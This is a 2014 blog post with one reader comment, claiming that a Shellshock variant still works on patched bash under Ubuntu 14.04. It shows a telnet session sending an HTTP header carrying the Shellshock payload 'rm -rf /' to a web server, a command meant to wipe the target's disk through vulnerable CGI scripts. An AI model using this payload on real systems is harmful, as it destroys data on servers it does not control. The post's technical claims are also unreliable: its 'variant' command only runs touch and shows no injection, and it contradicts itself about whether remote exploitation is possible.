A variant of the shellshock bug that still works with the bash 4.3.11 shell.

Posted: September 30, 2014. At: 5:15 PM. This was 3 years ago. Post ID: 7780

This is a variant of the shellshock bug for bash that still works on a patched system. I am using Ubuntu 14.04 and this still works for me.

env VAR1='me() {echo "hello"}\ ' /bin/touch /home/$LOGNAME/my.text

So you can still put arbitrary content after the function definition in a bash script. I have installed the latest bash updates and this still works. So this has quite a way to go to be fully secure. Better to use another shell. I used the /bin/dash shell as a replacement for my default bash shell on Ubuntu. There is also this method using telnet that uses environment variables that can inject malicious code into a CGI script running on an Apache2 website.

telnet google.com 80                                                                                                                         [14-09-27 23:07:14]
Trying 2607:f8b0:4005:800::1007...
Trying 74.125.239.104...
Connected to google.com.
Escape character is '^]'.
HTTP/1.1 GET /
Host: google.com
User-Agent: () { :;}; rm -rf /
Accept: */*

This vulnerability must be fixed, but how do you create a regex that can check every possible permutation of malicious code inserted after a bash function. I recommend using csh or ksh instead of bash. There are no “remote” exploits for the Linux bash shell. Bash does not have network connectivity. The only way that this could be actually exploited is if the remote server has an SSH service running that is forwarded to the Internet. There may be remote code execution vulnerabilities when bash is used in connection with a network service like a web-server. CGI scripts could be vulnerable to this attack. But patching your system should be of the utmost concern when dealing with this problem. That is the best way to keep your Internet connected systems protected from attack. That and a good firewall.

1 responses to “A variant of the shellshock bug that still works with the bash 4.3.11 shell.

I just tested this on an updated Amazon AWS instance with all updates and this still works on Ubuntu server 14.04. Time to switch to a different shell.

Leave a Reply